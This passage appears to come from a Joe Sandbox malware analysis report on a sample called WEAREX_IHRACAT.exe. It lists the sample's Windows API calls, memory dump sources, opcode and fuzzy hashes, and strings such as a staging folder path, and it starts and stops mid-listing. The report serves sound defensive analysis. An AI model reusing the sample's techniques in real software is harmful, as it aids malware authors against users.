                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.2459293214.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459349894.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459378881.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                          • Instruction ID: 4a9ded8e7257bdb173b40b31e6f72bab7f1256b0bf9ca600b2aeebe95f436f9e
                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                          • Instruction Fuzzy Hash: CFF09BF19097A0DEF350DF688C847063BE4E3983C4B03852AE3A8E6268EB344048CF19
                          Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: b215341e9a48861ce1ae71868c0b38dd620c6d649e98988d9f5b4c3be07a7ee8
                          • Instruction ID: 9dcfef7e452db0a7b9eae0ecc372c740654949990ed8f849d8faaf285a661dbe
                          • Opcode Fuzzy Hash: b215341e9a48861ce1ae71868c0b38dd620c6d649e98988d9f5b4c3be07a7ee8
                          • Instruction Fuzzy Hash: 8BD012B2708100D7DB10DFA59A0899D77749B15325F700977E101F21D0D2B895519A2A
                          Function 0040330D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                          • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                          • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                          • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                          Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
                          • Instruction ID: 218267b357b67079b54de8dffa8c027c75f66e7c1ef01c1e874d3fe206bc0dcd
                          • Opcode Fuzzy Hash: 4ce028c416631f4879f61a6c47eaa424c852bb073f15e560c5dd11f99f423e06
                          • Instruction Fuzzy Hash: A3D0C9B7B181009BE750EFB9AE8985B73A8E7513297604C73D942F20A1D578D8028A79
                          Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.2459293214.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459349894.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 00000000.00000002.2459378881.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: AllocGlobal
                          • String ID:
                          • API String ID: 3761449716-0
                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

                          Non-executed Functions

                          Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,00000403), ref: 00405330
                          • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                          • GetClientRect.USER32(?,?), ref: 0040537C
                          • GetSystemMetrics.USER32(00000015), ref: 00405384
                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                          • ShowWindow.USER32(?,00000008), ref: 00405420
                          • GetDlgItem.USER32(?,000003EC), ref: 00405441
                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                          • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                            • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                          • GetDlgItem.USER32(?,000003EC), ref: 00405493
                          • CreateThread.KERNEL32(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                          • CloseHandle.KERNEL32(00000000), ref: 004054A8
                          • ShowWindow.USER32(00000000), ref: 004054CC
                          • ShowWindow.USER32(?,00000008), ref: 004054D1
                          • ShowWindow.USER32(00000008), ref: 0040551B
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                          • CreatePopupMenu.USER32 ref: 00405560
                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                          • GetWindowRect.USER32(?,?), ref: 00405594
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                          • OpenClipboard.USER32(00000000), ref: 004055F5
                          • EmptyClipboard.USER32 ref: 004055FB
                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                          • GlobalLock.KERNEL32(00000000), ref: 00405611
                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                          • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                          • CloseClipboard.USER32 ref: 00405656
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID: {
                          • API String ID: 590372296-366298937
                          • Opcode ID: 0272c2246cca4647d700f70f2fd171747a3fdfbbef28cbeed5ce4a742598da06
                          • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                          • Opcode Fuzzy Hash: 0272c2246cca4647d700f70f2fd171747a3fdfbbef28cbeed5ce4a742598da06
                          • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69
                          Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                          • GetDlgItem.USER32(?,00000408), ref: 00404B31
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                          • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                          • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                          • DeleteObject.GDI32(00000000), ref: 00404C04
                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                          • ShowWindow.USER32(?,00000005), ref: 00404D5E
                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                          • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                          • GlobalFree.KERNEL32(?), ref: 00404F3E
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
                          • ShowWindow.USER32(?,00000000), ref: 004050DD
                          • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                          • ShowWindow.USER32(00000000), ref: 004050EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 1638840714-813528018
                          • Opcode ID: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
                          • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                          • Opcode Fuzzy Hash: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
                          • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                          Function 004045C8 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 269stringCOMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,000003FB), ref: 00404617
                          • SetWindowTextW.USER32(00000000,?), ref: 00404641
                          • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                          • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                          • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 0040472F
                          • lstrcatW.KERNEL32(?,Call), ref: 0040473B
                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                            • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                            • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061DF
                            • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                            • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061F3
                            • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00406206
                          • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                          • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                          • String ID: A$C:\Users\user\gangningerne\jot\mtn$Call
                          • API String ID: 2246997448-3840848091
                          • Opcode ID: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
                          • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                          • Opcode Fuzzy Hash: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
                          • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                          Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                          Strings
                          • C:\Users\user\gangningerne\jot\mtn\Discomplexion, xrefs: 004020F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CreateInstance
                          • String ID: C:\Users\user\gangningerne\jot\mtn\Discomplexion
                          • API String ID: 542301482-462110826
                          • Opcode ID: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
                          • Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
                          • Opcode Fuzzy Hash: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
                          • Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55
                          Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                          Download Yara Rule
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                          • ShowWindow.USER32(?), ref: 00403CAE
                          • DestroyWindow.USER32 ref: 00403CC2
                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                          • GetDlgItem.USER32(?,?), ref: 00403CFF
                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                          • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                          • GetDlgItem.USER32(?,00000001), ref: 00403DC8
                          • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
                          • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                          • ShowWindow.USER32(00000000,?), ref: 00403F04
                          • EnableWindow.USER32(?,?), ref: 00403F16
                          • EnableWindow.USER32(?,?), ref: 00403F31
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
                          • EnableMenuItem.USER32(00000000), ref: 00403F4E
                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                          • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                          • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                          • ShowWindow.USER32(?,0000000A), ref: 004040EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                          • String ID:
                          • API String ID: 184305955-0
                          • Opcode ID: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
                          • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                          • Opcode Fuzzy Hash: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
                          • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E
                          Function 004042CA Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
                          Download Yara Rule
                          APIs
                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
                          • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
                          • GetSysColor.USER32(?), ref: 004043AA
                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                          • lstrlenW.KERNEL32(?), ref: 004043CB
                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                          • GetDlgItem.USER32(?,0000040A), ref: 00404446
                          • SendMessageW.USER32(00000000), ref: 0040444D
                          • GetDlgItem.USER32(?,000003E8), ref: 00404478
                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                          • SetCursor.USER32(00000000), ref: 004044CC
                          • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                          • SetCursor.USER32(00000000), ref: 004044F0
                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
